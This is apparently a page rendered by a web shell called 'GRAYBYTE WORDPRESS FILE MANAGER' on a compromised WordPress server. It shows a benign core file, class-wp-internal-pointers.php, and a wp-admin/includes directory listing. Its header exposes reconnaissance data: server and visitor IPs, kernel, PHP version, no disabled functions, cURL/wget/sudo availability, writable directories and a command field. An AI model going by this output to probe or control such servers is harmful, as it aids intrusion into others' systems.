GRAYBYTE WORDPRESS FILE MANAGER9898

Server IP : 3.104.188.249 / Your IP : 216.73.217.141
System : Linux ip-172-26-1-242 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
PHP Version : 8.3.31
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : ON | Pkexec : OFF
Directory : /var/www/html/wp-admin/includes/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /var/www/html/wp-admin/includes//class-wp-internal-pointers.php
<?php
/**
 * Administration API: WP_Internal_Pointers class
 *
 * @package WordPress
 * @subpackage Administration
 * @since 4.4.0
 */

/**
 * Core class used to implement an internal admin pointers API.
 *
 * @since 3.3.0
 */
#[AllowDynamicProperties]
final class WP_Internal_Pointers {
	/**
	 * Initializes the new feature pointers.
	 *
	 * @since 3.3.0
	 *
	 * All pointers can be disabled using the following:
	 *     remove_action( 'admin_enqueue_scripts', array( 'WP_Internal_Pointers', 'enqueue_scripts' ) );
	 *
	 * Individual pointers (e.g. wp390_widgets) can be disabled using the following:
	 *
	 *    function yourprefix_remove_pointers() {
	 *        remove_action(
	 *            'admin_print_footer_scripts',
	 *            array( 'WP_Internal_Pointers', 'pointer_wp390_widgets' )
	 *        );
	 *    }
	 *    add_action( 'admin_enqueue_scripts', 'yourprefix_remove_pointers', 11 );
	 *
	 * @param string $hook_suffix The current admin page.
	 */
	public static function enqueue_scripts( $hook_suffix ) {
		/*
		 * Register feature pointers
		 *
		 * Format:
		 *     array(
		 *         hook_suffix => pointer callback
		 *     )
		 *
		 * Example:
		 *     array(
		 *         'themes.php' => 'wp390_widgets'
		 *     )
		 */
		$registered_pointers = array(
			// None currently.
		);

		// Check if screen related pointer is registered.
		if ( empty( $registered_pointers[ $hook_suffix ] ) ) {
			return;
		}

		$pointers = (array) $registered_pointers[ $hook_suffix ];

		/*
		 * Specify required capabilities for feature pointers
		 *
		 * Format:
		 *     array(
		 *         pointer callback => Array of required capabilities
		 *     )
		 *
		 * Example:
		 *     array(
		 *         'wp390_widgets' => array( 'edit_theme_options' )
		 *     )
		 */
		$caps_required = array(
			// None currently.
		);

		// Get dismissed pointers.
		$dismissed = explode( ',', (string) get_user_meta( get_current_user_id(), 'dismissed_wp_pointers', true ) );

		$got_pointers = false;
		foreach ( array_diff( $pointers, $dismissed ) as $pointer ) {
			if ( isset( $caps_required[ $pointer ] ) ) {
				foreach ( $caps_required[ $pointer ] as $cap ) {
					if ( ! current_user_can( $cap ) ) {
						continue 2;
					}
				}
			}

			// Bind pointer print function.
			add_action( 'admin_print_footer_scripts', array( 'WP_Internal_Pointers', 'pointer_' . $pointer ) );
			$got_pointers = true;
		}

		if ( ! $got_pointers ) {
			return;
		}

		// Add pointers script and style to queue.
		wp_enqueue_style( 'wp-pointer' );
		wp_enqueue_script( 'wp-pointer' );
	}

	/**
	 * Prints the pointer JavaScript data.
	 *
	 * @since 3.3.0
	 *
	 * @param string $pointer_id The pointer ID.
	 * @param string $selector The HTML elements, on which the pointer should be attached.
	 * @param array  $args Arguments to be passed to the pointer JS (see wp-pointer.js).
	 */
	private static function print_js( $pointer_id, $selector, $args ) {
		if ( empty( $pointer_id ) || empty( $selector ) || empty( $args ) || empty( $args['content'] ) ) {
			return;
		}

		?>
		<script>
		(function($){
			var options = <?php echo wp_json_encode( $args, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ); ?>, setup;

			if ( ! options )
				return;

			options = $.extend( options, {
				close: function() {
					$.post( ajaxurl, {
						pointer: '<?php echo $pointer_id; ?>',
						action: 'dismiss-wp-pointer'
					});
				}
			});

			setup = function() {
				$('<?php echo $selector; ?>').first().pointer( options ).pointer('open');
			};

			if ( options.position && options.position.defer_loading )
				$(window).bind( 'load.wp-pointers', setup );
			else
				$( function() {
					setup();
				} );

		})( jQuery );
		</script>
		<?php
	}

	public static function pointer_wp330_toolbar() {}
	public static function pointer_wp330_media_uploader() {}
	public static function pointer_wp330_saving_widgets() {}
	public static function pointer_wp340_customize_current_theme_link() {}
	public static function pointer_wp340_choose_image_from_library() {}
	public static function pointer_wp350_media() {}
	public static function pointer_wp360_revisions() {}
	public static function pointer_wp360_locks() {}
	public static function pointer_wp390_widgets() {}
	public static function pointer_wp410_dfw() {}
	public static function pointer_wp496_privacy() {}

	/**
	 * Prevents new users from seeing existing 'new feature' pointers.
	 *
	 * @since 3.3.0
	 *
	 * @param int $user_id User ID.
	 */
	public static function dismiss_pointers_for_new_users( $user_id ) {
		add_user_meta( $user_id, 'dismissed_wp_pointers', '' );
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 04 2026 19:23:20
www-data / www-data
2775
.htaccess
0.124 KB
June 04 2026 19:23:20
www-data / www-data
0444
admin-filters.php
7.846 KB
May 27 2026 03:19:33
www-data / www-data
0664
admin.php
3.543 KB
May 27 2026 03:19:33
www-data / www-data
0664
ajax-actions.php
149.194 KB
May 27 2026 03:19:33
www-data / www-data
0664
bookmark.php
11.404 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-automatic-upgrader-skin.php
3.577 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-bulk-plugin-upgrader-skin.php
2.529 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-bulk-theme-upgrader-skin.php
2.598 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-bulk-upgrader-skin.php
6.505 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-core-upgrader.php
14.842 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-custom-background.php
21.197 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-custom-image-header.php
48.03 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-file-upload-upgrader.php
4.065 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-ftp-pure.php
5.299 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-ftp-sockets.php
8.28 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-ftp.php
26.702 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-language-pack-upgrader-skin.php
2.803 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-language-pack-upgrader.php
15.164 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-pclzip.php
192.085 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-plugin-installer-skin.php
11.667 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-plugin-upgrader-skin.php
3.201 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-plugin-upgrader.php
22.704 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-theme-installer-skin.php
12.67 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-theme-upgrader-skin.php
4.078 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-theme-upgrader.php
26.155 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-walker-category-checklist.php
4.973 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-walker-nav-menu-checklist.php
5.646 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-walker-nav-menu-edit.php
13.963 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-ajax-upgrader-skin.php
4.095 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-application-passwords-list-table.php
6.786 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-automatic-updater.php
60.451 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-comments-list-table.php
33.802 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-community-events.php
18.21 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-debug-data.php
70.273 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-filesystem-base.php
23.838 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-filesystem-direct.php
18.171 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-filesystem-ftpext.php
22.728 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-filesystem-ftpsockets.php
18.063 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-filesystem-ssh2.php
22.842 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-importer.php
7.64 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-internal-pointers.php
4.485 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-links-list-table.php
9.291 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-list-table-compat.php
1.462 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-list-table.php
51.836 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-media-list-table.php
26.402 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-ms-sites-list-table.php
22.231 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-ms-themes-list-table.php
29.519 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-ms-users-list-table.php
15.323 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-plugin-install-list-table.php
24.389 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-plugins-list-table.php
56.745 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-post-comments-list-table.php
1.419 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-posts-list-table.php
63.46 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-privacy-data-export-requests-list-table.php
5.433 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-privacy-data-removal-requests-list-table.php
5.581 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-privacy-policy-content.php
31.899 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-privacy-requests-table.php
14.444 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-screen.php
36.563 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-site-health-auto-updates.php
14.001 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-site-health.php
128.165 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-site-icon.php
6.264 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-terms-list-table.php
20.577 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-theme-install-list-table.php
15.335 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-themes-list-table.php
10.097 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-upgrader-skin.php
6.898 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-upgrader-skins.php
1.442 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-upgrader.php
47.232 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-users-list-table.php
18.559 KB
May 27 2026 03:19:33
www-data / www-data
0664
comment.php
6.085 KB
May 27 2026 03:19:33
www-data / www-data
0664
continents-cities.php
20.059 KB
May 27 2026 03:19:33
www-data / www-data
0664
credits.php
5.695 KB
May 27 2026 03:19:33
www-data / www-data
0664
dashboard.php
68.733 KB
May 27 2026 03:19:33
www-data / www-data
0664
deprecated.php
40.774 KB
May 27 2026 03:19:33
www-data / www-data
0664
edit-tag-messages.php
1.443 KB
May 27 2026 03:19:33
www-data / www-data
0664
export.php
25.367 KB
May 27 2026 03:19:33
www-data / www-data
0664
file.php
95.618 KB
May 27 2026 03:19:33
www-data / www-data
0664
image-edit.php
42.963 KB
May 27 2026 03:19:33
www-data / www-data
0664
image.php
44.112 KB
May 27 2026 03:19:33
www-data / www-data
0664
import.php
6.462 KB
May 27 2026 03:19:33
www-data / www-data
0664
list-table.php
3.713 KB
May 27 2026 03:19:33
www-data / www-data
0664
media.php
117.123 KB
May 27 2026 03:19:33
www-data / www-data
0664
menu.php
9.414 KB
May 27 2026 03:19:33
www-data / www-data
0664
meta-boxes.php
65.29 KB
May 27 2026 03:19:33
www-data / www-data
0664
misc.php
45.354 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-admin-filters.php
1.266 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-deprecated.php
3.682 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms.php
33.449 KB
May 27 2026 03:19:33
www-data / www-data
0664
nav-menu.php
47.976 KB
May 27 2026 03:19:33
www-data / www-data
0664
network.php
26.404 KB
May 27 2026 03:19:33
www-data / www-data
0664
noop.php
1.121 KB
May 27 2026 03:19:33
www-data / www-data
0664
options.php
4.145 KB
May 27 2026 03:19:33
www-data / www-data
0664
plugin-install.php
38.125 KB
May 27 2026 03:19:33
www-data / www-data
0664
plugin.php
91.095 KB
May 27 2026 03:19:33
www-data / www-data
0664
post.php
80.332 KB
May 27 2026 03:19:33
www-data / www-data
0664
privacy-tools.php
32.657 KB
May 27 2026 03:19:33
www-data / www-data
0664
revision.php
16.239 KB
May 27 2026 03:19:33
www-data / www-data
0664
schema.php
44.515 KB
May 27 2026 03:19:33
www-data / www-data
0664
screen.php
6.24 KB
May 27 2026 03:19:33
www-data / www-data
0664
taxonomy.php
8.284 KB
May 27 2026 03:19:33
www-data / www-data
0664
template.php
97.348 KB
May 27 2026 03:19:33
www-data / www-data
0664
theme-install.php
6.826 KB
May 27 2026 03:19:33
www-data / www-data
0664
theme.php
46.419 KB
May 27 2026 03:19:33
www-data / www-data
0664
translation-install.php
10.815 KB
May 27 2026 03:19:33
www-data / www-data
0664
update-core.php
71.065 KB
May 27 2026 03:19:33
www-data / www-data
0664
update.php
34.027 KB
May 27 2026 03:19:33
www-data / www-data
0664
upgrade.php
113.958 KB
May 27 2026 03:19:33
www-data / www-data
0664
user.php
23.389 KB
May 27 2026 03:19:33
www-data / www-data
0664
widgets.php
10.299 KB
May 27 2026 03:19:33
www-data / www-data
0664

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF